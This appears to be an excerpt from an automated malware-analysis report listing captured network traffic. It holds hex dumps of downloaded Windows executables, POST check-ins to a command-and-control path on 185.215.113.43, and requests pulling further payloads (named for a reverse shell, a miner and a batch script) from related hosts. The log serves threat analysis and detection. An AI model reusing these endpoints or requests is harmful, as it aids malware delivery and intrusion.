00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 f0 06 00 00 02 00 00 00 5e 06 00 00 00 00 00 00 
00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 e0 29 00 00 00 07 00 00 02 00 00 00 60 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 6f 61 73 6a 63 61 79 00 50 1a 00 00 e0 30 00 00 4a 1a 00 00 62 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6d 67 74 6b 70 74 77 6b 00 10 00 00 00 30 4b 00 00 04 00 00 00 ac 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 40 4b 00 00 22 00 00 00 b0 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:18:02 GMTContent-Type: application/octet-streamContent-Length: 3218752Last-Modified: Tue, 11 Feb 2025 05:41:47 GMTConnection: keep-aliveETag: "67aae31b-311d40"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 c8 f2 43 da 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 30 00 00 f0 00 00 00 08 00 00 00 00 00 00 be 0e 01 00 00 20 00 00 00 20 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 31 00 00 04 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 70 0e 01 00 4b 00 00 00 00 20 01 00 98 05 00 00 00 00 00 00 00 00 00 00 00 d8 30 00 40 45 00 00 00 40 01 00 0c 00 00 00 21 0e 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 ee 00 00 00 20 00 00 00 f0 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 98 05 00 00 00 20 01 00 00 06 00 00 00 f4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 01 00 00 02 00 00 00 fa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 64 61 74 61 00 00 00 dc 2f 00 00 60 01 00 00 dc 2f 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:18:09 GMTContent-Type: application/octet-streamContent-Length: 2074624Last-Modified: Sun, 09 Feb 2025 11:32:34 GMTConnection: keep-aliveETag: "67a89252-1fa800"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 12 25 9e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 66 04 00 00 ac 00 00 00 00 00 00 00 70 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 4a 00 00 04 00 00 da d7 1f 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 90 05 00 6b 00 00 00 00 80 05 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 91 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 70 05 00 00 10 00 00 00 70 05 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 80 05 00 00 02 00 00 00 80 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 05 00 00 02 00 00 00 82 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 2a 00 00 a0 05 00 00 02 00 00 00 84 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 75 66 6d 62 74 6c 78 00 00 1a 00 00 60 30 00 00 fa 19 00 00 86 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 
00 00 e0 6b 72 68 6e 64 63 6c 66 00 10 00 00 00 60 4a 00 00 06 00 00 00 80 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 4a 00 00 22 00 00 00 86 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:18:20 GMTContent-Type: application/octet-streamContent-Length: 2168320Last-Modified: Sat, 08 Feb 2025 13:31:29 GMTConnection: keep-aliveETag: "67a75cb1-211600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1d e9 b6 df 59 88 d8 8c 59 88 d8 8c 59 88 d8 8c 33 94 da 8c 70 88 d8 8c 59 88 d9 8c 5b 88 d8 8c eb 94 c8 8c 5b 88 d8 8c 59 88 d8 8c 56 88 d8 8c e1 8e de 8c 58 88 d8 8c 52 69 63 68 59 88 d8 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 45 5f 8e 66 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 de 00 00 00 b6 05 00 00 00 00 00 00 c0 4b 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 4b 00 00 04 00 00 21 06 22 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5b f0 06 00 6f 00 00 00 00 e0 06 00 48 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 06 00 00 10 00 00 00 4a 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 48 04 00 00 00 e0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 f0 06 00 00 02 00 00 00 5e 06 00 00 00 00 00 00 
00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 20 2a 00 00 00 07 00 00 02 00 00 00 60 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 70 75 68 68 64 76 67 00 90 1a 00 00 20 31 00 00 8c 1a 00 00 62 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 7a 72 74 6a 65 76 65 00 10 00 00 00 b0 4b 00 00 06 00 00 00 ee 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 4b 00 00 22 00 00 00 f4 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:18:26 GMTContent-Type: application/octet-streamContent-Length: 1813504Last-Modified: Mon, 10 Feb 2025 16:18:45 GMTConnection: keep-aliveETag: "67aa26e5-1bac00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 a2 a9 0c f0 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 74 01 00 00 08 00 00 00 00 00 00 00 a0 47 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 47 00 00 04 00 00 ac 71 1c 00 03 00 40 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 c0 01 00 69 00 00 00 00 a0 01 00 48 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 c1 01 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 01 00 00 20 00 00 00 a4 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 48 04 00 00 00 a0 01 00 00 04 00 00 00 c4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 c0 01 00 00 02 00 00 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 e0 2a 00 00 e0 01 00 00 02 00 00 00 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 68 73 75 70 6e 70 6d 00 c0 1a 00 00 c0 2c 00 00 ba 1a 00 00 cc 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 40 00 00 e0 6f 6a 78 75 69 62 76 77 00 20 00 00 00 80 47 00 00 04 00 00 00 86 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 a0 47 00 00 22 00 00 00 8a 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:18:56 GMTContent-Type: application/octet-streamContent-Length: 2155008Last-Modified: Tue, 11 Feb 2025 17:11:35 GMTConnection: keep-aliveETag: "67ab84c7-20e200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 d0 4b 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 4c 00 00 04 00 00 51 4b 21 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 58 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 ae 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 ad 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 58 04 00 00 00 
90 06 00 00 04 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 e0 2a 00 00 b0 06 00 00 02 00 00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 70 70 74 66 73 68 65 00 30 1a 00 00 90 31 00 00 24 1a 00 00 98 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 7a 67 6f 62 61 66 74 6d 00 10 00 00 00 c0 4b 00 00 04 00 00 00 bc 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 4b 00 00 22 00 00 00 c0 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:18:56 GMTContent-Type: application/octet-streamContent-Length: 1775616Last-Modified: Tue, 11 Feb 2025 17:09:31 GMTConnection: keep-aliveETag: "67ab844b-1b1800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 20 46 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 46 00 00 04 00 00 8d 0e 1c 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 64 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 40 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 64 05 00 00 00 60 00 00 00 04 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 2a 00 00 a0 00 00 00 02 00 00 00 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 68 72 72 6e 62 6f 6d 6e 00 a0 1a 00 00 60 2b 00 00 8a 1a 00 00 68 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 40 00 00 e0 63 62 67 63 6a 79 72 70 00 20 00 00 00 00 46 00 00 04 00 00 00 f2 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 20 46 00 00 22 00 00 00 f6 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: GET /files/748049926/k6Sly2p.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 35 33 35 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1075350001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /testdef/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /defend/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 35 34 38 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1075489001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /test/am_no.bat HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 35 34 39 30 30 32 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1075490021&unit=246122658369
Source: global traffic HTTP traffic detected: GET /files/c0dxnfz/random.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 35 35 30 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1075509001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /files/ReverseSheller/random.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
